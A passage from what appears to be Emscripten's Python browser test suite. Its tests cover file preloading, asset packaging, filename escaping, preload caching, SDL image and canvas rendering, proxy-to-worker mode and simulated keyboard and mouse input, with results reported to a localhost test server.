Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete(self.in_dir('assets'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except:
pass
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
data = os.path.join(self.get_dir(), 'file.txt')
open(data, 'w').write('''Hello!''')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'manual_download_data.js', '--preload-file', data + '@/file.txt']).communicate()
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), os.path.join(self.get_dir(), 'manual_download_data.html'))
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
Popen([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file]).communicate()
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
Popen([PYTHON, EMCC, cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1']).communicate()
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, FILE_PACKAGER, os.path.join(self.get_dir(), 'somefile.data'), '--use-preload-cache', '--indexedDB-name=testdb', '--preload', os.path.join(self.get_dir(), 'somefile.txt'), '--js-output=' + os.path.join(self.get_dir(), 'somefile.js')]).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--js-library', os.path.join(self.get_dir(), 'test.js'), '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'));
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'));
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'));
os.makedirs(os.path.join(self.get_dir(), 'cdn'));
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
# change the file package base dir to look in a "cdn". note that normally you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "cdn/", '))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
def test():
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
test()
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
open(self.in_dir("data.txt"), "w").write('''data''');
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
'''))
open(os.path.join(self.get_dir(), 'on_window_error_shell.html'), 'w').write(r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
filePackagePrefixURL: "''' + assetLocalization + r'''",
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>'''
)
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
shutil.move('test.data','missing.data');
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for filePackagePrefixURL
#open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "http:/localhost:8888/cdn/", '))
#test()
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
def test_sdl_canvas_proxy(self):
open('data.txt', 'w').write('datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_hardware
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates above test, but verifies we can run outside of the btest harness
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
original = open('test.js').read()
def copy(to, js_mod, html_mod = lambda x: x):
open(to + '.html', 'w').write(html_mod(open('test.html').read().replace('test.js', to + '.js')))
open(to + '.js', 'w').write(js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut']).communicate()
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/kripken/emscripten/issues/4069.
open(os.path.join(self.get_dir(), 'flag_0.js'), 'w').write('''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for emterps in [
[],
['-DTEST_SLEEP', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'ASSERTIONS=1', '-s', "SAFE_HEAP=1"]
]:
print(delay, defines, emterps)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
%s
//out('push keydown');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
//out('push keyup');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html'] + defines + emterps + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keypress(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
